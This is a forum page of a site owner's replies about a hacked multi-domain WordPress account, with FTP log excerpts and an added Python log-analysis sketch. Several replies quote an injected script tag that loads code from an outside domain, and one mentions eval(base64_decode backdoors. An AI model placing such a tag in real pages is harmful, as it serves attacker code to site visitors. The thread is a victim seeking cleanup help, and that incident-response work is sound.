Forum Replies Created

Viewing 15 replies - 1 through 15 (of 165 total)
  • Thread Starter talia

    (@talia)

    Thanks

    I did block the IP but this morning I found no evidence anyone had been in the ftp account according to the access logs but this

    <script src=https://ez-paintinginc.com/lindy/index.php ></script>

    has been inserted back into the html file

    I don’t really understand a lot of the technical stuff. I’m just doing what I can until my tech person is available to work on it. Hopefully she’ll know how to set up the .htaccess file and other things to help protect my site.

    Thread Starter talia

    (@talia)

    P.S. The strange thing is that I’ve been in on the ftp account but my IP address doesn’t show in the log

    Thread Starter talia

    (@talia)

    I found a log file for https://ftp.mydomain.com

    It says it has been accessed by IP 216.97.230.50 which whois shows as being hosting company LunarPages. They are not my hosting company so there is no reason why anyone from there should be accessing my ftp account

    OrgName: Lunar Pages
    OrgID: ACIDL
    Address: 100 East La Habra Blvd.
    City: La Habra
    StateProv: CA
    PostalCode: 90631
    Country: US

    Here is a sample from the log

    Fri Oct 23 15:50:34 2009 0 216.97.230.50 2029 /home2/mydomain/public_html/folder/wp-content/plugins/hello.php a _ o r mydomain ftp 1 * c
    Fri Oct 23 15:50:34 2009 0 216.97.230.50 5663 /home2/mydomain/public_html/folder/wp-content/plugins/sidebarLogin.php a _ o r mydomain ftp 1 * c
    Fri Oct 23 15:50:34 2009 0 216.97.230.50 31 /home2/mydomain/public_html/folder/wp-content/index.php a _ o r mydomain ftp 1 * c
    Fri Oct 23 15:50:34 2009 0 216.97.230.50 1920 /home2/mydomain/public_html/folder/wp-content/index.php a _ i r mydomain ftp 1 * c
    Fri Oct 23 15:50:35 2009 0 216.97.230.50 8635 /home2/mydomain/public_html/folder/wp-includes/js/autosave.js a _ o r mydomain ftp 1 * c
    Fri Oct 23 15:50:35 2009 0 216.97.230.50 8720 /home2/mydomain/public_html/folder/wp-includes/js/autosave.js a _ i r mydomain ftp 1 * c
    Fri Oct 23 15:50:35 2009 0 216.97.230.50 30316 /home2/mydomain/public_html/folder/wp-includes/js/colorpicker.js a _ o r mydomain ftp 1 * c
    Fri Oct 23 15:50:35 2009 0 216.97.230.50 30401 /home2/mydomain/public_html/folder/wp-includes/js/colorpicker.js a _ i r mydomain ftp 1 * c
    Fri Oct 23 15:50:35 2009 0 216.97.230.50 125339 /home2/mydomain/public_html/folder/wp-includes/js/prototype.js a _ o r mydomain ftp 1 * c
    Fri Oct 23 15:50:36 2009 0 216.97.230.50 125424 /home2/mydomain/public_html/folder/wp-includes/js/prototype.js a _ i r mydomain ftp 1 * c
    Fri Oct 23 15:50:36 2009 0 216.97.230.50 10850 /home2/mydomain/public_html/folder/wp-includes/js/quicktags.js a _ o r mydomain ftp 1

    Could this be my hacker and is it safe to ban that IP? Any help appreciated

    Thanks
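Added example (not part of the original post or thread): a Python sketch that parses xferlog-format lines like the sample above and lists files that one host downloaded and then uploaded again within seconds, with the size change. The function names and the 10-second window are assumptions chosen for illustration.

```python
import re
from collections import Counter
from datetime import datetime

# xferlog: date, secs, host, bytes, path, type, flag, direction (o/i/d), mode, user
XFER = re.compile(
    r"^(?P<ts>\w{3} \w{3} +\d+ [\d:]{8} \d{4}) \d+ (?P<host>\S+) (?P<size>\d+) "
    r"(?P<path>\S+) [ab] \S+ (?P<dir>[oid]) [agr] (?P<user>\S+)"
)

# Lines copied from the post above; the last one is cut short there as well.
SAMPLE = """\
Fri Oct 23 15:50:34 2009 0 216.97.230.50 31 /home2/mydomain/public_html/folder/wp-content/index.php a _ o r mydomain ftp 1 * c
Fri Oct 23 15:50:34 2009 0 216.97.230.50 1920 /home2/mydomain/public_html/folder/wp-content/index.php a _ i r mydomain ftp 1 * c
Fri Oct 23 15:50:35 2009 0 216.97.230.50 8635 /home2/mydomain/public_html/folder/wp-includes/js/autosave.js a _ o r mydomain ftp 1 * c
Fri Oct 23 15:50:35 2009 0 216.97.230.50 8720 /home2/mydomain/public_html/folder/wp-includes/js/autosave.js a _ i r mydomain ftp 1 * c
Fri Oct 23 15:50:35 2009 0 216.97.230.50 125339 /home2/mydomain/public_html/folder/wp-includes/js/prototype.js a _ o r mydomain ftp 1 * c
Fri Oct 23 15:50:36 2009 0 216.97.230.50 125424 /home2/mydomain/public_html/folder/wp-includes/js/prototype.js a _ i r mydomain ftp 1 * c
Fri Oct 23 15:50:36 2009 0 216.97.230.50 10850 /home2/mydomain/public_html/folder/wp-includes/js/quicktags.js a _ o r mydomain ftp 1
"""

def parse(line):
    """Parse one xferlog line into a dict, or None if it does not match."""
    m = XFER.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
    return dict(m.groupdict(), ts=ts, size=int(m["size"]))

def rewrite_pairs(log_text, window_s=10):
    """Files a host downloaded ('o') then uploaded again ('i') within window_s seconds."""
    last_out, pairs = {}, []
    for rec in filter(None, map(parse, log_text.splitlines())):
        key = (rec["host"], rec["path"])
        if rec["dir"] == "o":
            last_out[key] = rec
        elif rec["dir"] == "i" and key in last_out:
            out = last_out.pop(key)
            if 0 <= (rec["ts"] - out["ts"]).total_seconds() <= window_s:
                pairs.append((key[0], key[1], out["size"], rec["size"]))
    return pairs

def growth_histogram(pairs):
    """Count rewritten files per byte delta; a repeated delta suggests one appended snippet."""
    return Counter(new - old for _, _, old, new in pairs)

if __name__ == "__main__":
    for host, path, old, new in rewrite_pairs(SAMPLE):
        print(f"{host} rewrote {path}: {old} -> {new} bytes ({new - old:+d})")
```

A burst of download-then-upload pairs from a host that is not the account owner, with files coming back larger, is the pattern worth checking in the full log before deciding what to block.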

    Thread Starter talia

    (@talia)

    Someone told me there is a way I can find the IP address of the hacker and block it. Anyone know how? And is it worth doing it? I figure they probably have rotating IP addresses anyway.

    This keeps finding its way onto my html pages
    <script src=https://ez-paintinginc.com/lindy/index.php ></script>

    I hope visitors to my site aren’t getting some sort of trojan or something happening to their computers.

    Thread Starter talia

    (@talia)

    Ahhh! Thanks, that explains why the ez-painting site was blank.

    It seems like the hackers have got into my html files and inserted scripts hosted at https://ez-paintinginc.com so the problem is bigger than I thought. I’ve deleted some of my websites, but I haven’t replaced them with new sites yet or restored WordPress. Getting there slowly.

    Thread Starter talia

    (@talia)

    Does anyone know if https://ez-paintinginc.com is a hack or legitimate?

    Thread Starter talia

    (@talia)

    Thanks jonimueller and iridiax for the links

    Thread Starter talia

    (@talia)

    You don’t want to have to clean up hacked sites over and over.

    Yes that was my fear. So if I understand you correctly I need to install the latest version of WP on ALL websites at the same time, or it will be able to hack into WP 2.8.4?

    Is this domain reference https://ez-paintinginc.com anything to do with the hack? It seems to be on some of my html websites but I can’t think how that reference got there. It appears to link to some sort of script and I am not sure if it’s another form of hack or something legit. I can’t find anything on it in Google.

    Thread Starter talia

    (@talia)

    Does anyone know if I need to remove all the websites at the same time or can progressively remove clean and then replace with the latest WP?

    Thread Starter talia

    (@talia)

    Lots of questions! If anyone can help I’d appreciate it

    I’ve read the instructions on restoring the files and I’m good to go, however I’m wondering how to handle the issue of multiple websites.

    I host with Bluehost, and have multiple domains. Some are WordPress, some aren’t, but most are php based. They are all on the same ftp account. If I put a fresh site on there with the latest version of WP, will the hackers still be able to hack that, because they still have back door access to the other php files on the system?

    i.e. can I progressively restore one domain at a time, or will they get hacked if I do that? Do I need instead to clear out all the php based domains?

    Also, I see that images aren’t usually hacked. What about pdf or mp3 files that I have online?

    Will my html files in other domains be okay? They don’t seem to have been hacked even though they’re on the same ftp account.

    Thanks!

    Thread Starter talia

    (@talia)

    The guys at Bluehost suggest changing the names of the scripts from php to html to make it harder for the hackers. Any thoughts on this idea?

    My sites have already been hacked again. Very frustrating. I’m not very techie so it’s taking me a while to make the changes they suggest.

    Thread Starter talia

    (@talia)

    Excellent, thanks for that

    Thread Starter talia

    (@talia)

    I’ve worked out which files to remove the eval(base64_decode code from and it seems to be working.

    How likely is it that I’ll be hacked again soon? My tech person says she can’t look at it for 2 weeks to “harden” up the files. I’m wondering if I should hire someone else?

    Thread Starter talia

    (@talia)

    OK I guessed it must be. Thanks for the input. I just wish I knew where it came from

    If I delete that part will it fix things? I managed to fix my basic (non-WordPress) files by deleting that part of the code. But WP has more files and that code is probably in more places.

    Any tips on how to get rid of it? I tried restoring my backup from a week ago but it doesn’t seem to be working. It’s weird as I only noticed the problem 3 days ago so I thought the backup from a week ago would be good.

    Thread Starter talia

    (@talia)

    Ok thanks Mike. Your plugin is great. I just have to find something to replace first RSS so I can use it.
